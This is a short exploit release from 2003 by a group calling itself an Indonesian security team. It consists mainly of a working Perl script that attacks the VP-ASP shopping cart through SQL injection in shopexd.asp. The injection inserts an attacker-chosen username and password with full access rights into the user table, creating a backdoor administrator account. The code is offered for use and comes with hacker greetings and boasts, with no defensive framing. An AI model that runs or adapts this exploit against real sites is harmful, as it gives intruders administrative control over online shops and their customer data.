$Id: bosen-exp.4,v1 14/05/2003 bosen Exp $ 1ndonesian Security Team (1st) Bosen Exploit #4 VP-ASP Exploit 14/05/2003 [1st] VP-ASP Exploit w/o LWP. Hi AresU :P _______________________________________________________________________________ Uhm :P my code smaller :P --- START --- #!/usr/bin/perl -w $pamer = " 1ndonesian Security Team (1st) ============================== aresu-fux2.pl, Album.pl Proof Of Concept - Remote Execution Exploit by : Bosen & TioEuy Discover by : TioEuy, AresU Greetz to : AresU, syzwz, TioEuy, sakitjiwa, muthafuka all #hackers\@centrin.net.id/austnet.org http://bosen.net/releases/ "; # shut up ! we're the best in our country :) use IO::Socket; print $pamer; if ($#ARGV<4){print "\n\n Usage: perl tio-fux2.pl \n\n";exit;} my $biji = "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29"; my $tio = "$ARGV[1]/shopexd.asp?id=$ARGV[2]"; $tio .= ";insert into tbluser (\"fldusername\",\"fldpassword\",\"fldaccess\") "; $tio .= "values ('$ARGV[3]','$ARGV[4]','$biji')--"; my $rio = "GET $tio HTTP/1.0\r\n Host: $ARGV[0]\r\n\r\n"; $gendut=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$ARGV[0]",PeerPort=>"80") or die "$ARGV[0] bauk !!"; $gendut -> autoflush(1); print $gendut "$rio"; # rio gendut ! sleep(7); close($gendut); --- EOF --- Bosen ====================== Original document can be fount at http://bosen.net/releases/?id=25